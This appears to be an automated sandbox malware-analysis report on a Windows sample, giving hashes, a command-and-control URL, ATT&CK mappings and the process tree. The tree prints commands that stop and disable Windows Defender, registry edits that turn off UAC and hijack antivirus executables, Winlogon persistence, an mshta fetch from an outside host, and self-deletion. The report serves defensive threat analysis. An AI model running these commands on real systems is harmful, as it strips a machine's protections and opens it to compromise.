Analysis
-
max time kernel
150s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
08-07-2024 20:15
Static task
static1
Behavioral task
behavioral1
Sample
2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
Resource
win10v2004-20240704-en
General
-
Target
2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
-
Size
2.2MB
-
MD5
2dab1dbc69f84a8582d118aeb9605c52
-
SHA1
6ebebcfc0f3d01c11afe21fe95a67af0b5578ba1
-
SHA256
13bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775
-
SHA512
c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4
-
SSDEEP
49152:dRRIZ2dUIPYiiqowvq00p7PiKXTqp/nYi:Lw/IrwzXOp/Yi
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=PDIZKVQX&2=i-s&3=104&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\addwwy.exe" addwwy.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" addwwy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" addwwy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" addwwy.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe addwwy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" addwwy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe addwwy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" addwwy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" addwwy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" addwwy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" addwwy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe addwwy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" addwwy.exe -
Deletes itself 1 IoCs
pid Process 3020 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2764 addwwy.exe -
Loads dropped DLL 2 IoCs
pid Process 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" addwwy.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2652 sc.exe 2780 sc.exe 2696 sc.exe 2700 sc.exe 2332 sc.exe 2640 sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2764 addwwy.exe Token: SeShutdownPrivilege 2764 addwwy.exe Token: SeDebugPrivilege 2764 addwwy.exe Token: SeShutdownPrivilege 2764 addwwy.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe 2764 addwwy.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2120 wrote to memory of 2696 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 30 PID 2120 wrote to memory of 2696 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 30 PID 2120 wrote to memory of 2696 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 30 PID 2120 wrote to memory of 2696 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 30 PID 2120 wrote to memory of 2700 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 31 PID 2120 wrote to memory of 2700 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 31 PID 2120 wrote to memory of 2700 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 31 PID 2120 wrote to memory of 2700 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 31 PID 2120 wrote to memory of 1996 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 34 PID 2120 wrote to memory of 1996 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 34 PID 2120 wrote to memory of 1996 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 34 PID 2120 wrote to memory of 1996 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 34 PID 2120 wrote to memory of 2332 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 35 PID 2120 wrote to memory of 2332 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 35 PID 2120 wrote to memory of 2332 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 35 PID 2120 wrote to memory of 2332 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 35 PID 2120 wrote to memory of 2764 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 38 PID 2120 wrote to memory of 2764 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 38 PID 2120 wrote to memory of 2764 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 38 PID 2120 wrote to memory of 2764 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 38 PID 2120 wrote to memory of 3020 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 39 PID 2120 wrote to memory of 3020 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 39 PID 2120 wrote to memory of 3020 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 39 PID 2120 wrote to memory of 3020 2120 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 39 PID 1996 wrote to memory of 3008 1996 net.exe 41 PID 1996 wrote to memory of 3008 1996 net.exe 41 PID 1996 wrote to memory of 3008 1996 net.exe 41 PID 1996 wrote to memory of 3008 1996 net.exe 41 PID 2764 wrote to memory of 2780 2764 addwwy.exe 42 PID 2764 wrote to memory of 2780 2764 addwwy.exe 42 PID 2764 wrote to memory of 2780 2764 addwwy.exe 42 PID 2764 wrote to memory of 2780 2764 addwwy.exe 42 PID 2764 wrote to memory of 2652 2764 addwwy.exe 43 PID 2764 wrote to memory of 2652 2764 addwwy.exe 43 PID 2764 wrote to memory of 2652 2764 addwwy.exe 43 PID 2764 wrote to memory of 2652 2764 addwwy.exe 43 PID 2764 wrote to memory of 2904 2764 addwwy.exe 44 PID 2764 wrote to memory of 2904 2764 addwwy.exe 44 PID 2764 wrote to memory of 2904 2764 addwwy.exe 44 PID 2764 wrote to memory of 2904 2764 addwwy.exe 44 PID 2764 wrote to memory of 2640 2764 addwwy.exe 46 PID 2764 wrote to memory of 2640 2764 addwwy.exe 46 PID 2764 wrote to memory of 2640 2764 addwwy.exe 46 PID 2764 wrote to memory of 2640 2764 addwwy.exe 46 PID 2904 wrote to memory of 2612 2904 net.exe 50 PID 2904 wrote to memory of 2612 2904 net.exe 50 PID 2904 wrote to memory of 2612 2904 net.exe 50 PID 2904 wrote to memory of 2612 2904 net.exe 50 PID 2764 wrote to memory of 2632 2764 addwwy.exe 51 PID 2764 wrote to memory of 2632 2764 addwwy.exe 51 PID 2764 wrote to memory of 2632 2764 addwwy.exe 51 PID 2764 wrote to memory of 2632 2764 addwwy.exe 51 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System addwwy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" addwwy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" addwwy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" addwwy.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2696
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:3008
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:2332
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\addwwy.exeC:\Users\Admin\AppData\Roaming\Microsoft\addwwy.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2764 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2780
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2652
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:2612
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=PDIZKVQX&2=i-s&3=104&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Modifies Internet Explorer settings
PID:2632
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2DAB1D~1.EXE" >> NUL2⤵
- Deletes itself
PID:3020
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD52dab1dbc69f84a8582d118aeb9605c52
SHA16ebebcfc0f3d01c11afe21fe95a67af0b5578ba1
SHA25613bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775
SHA512c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4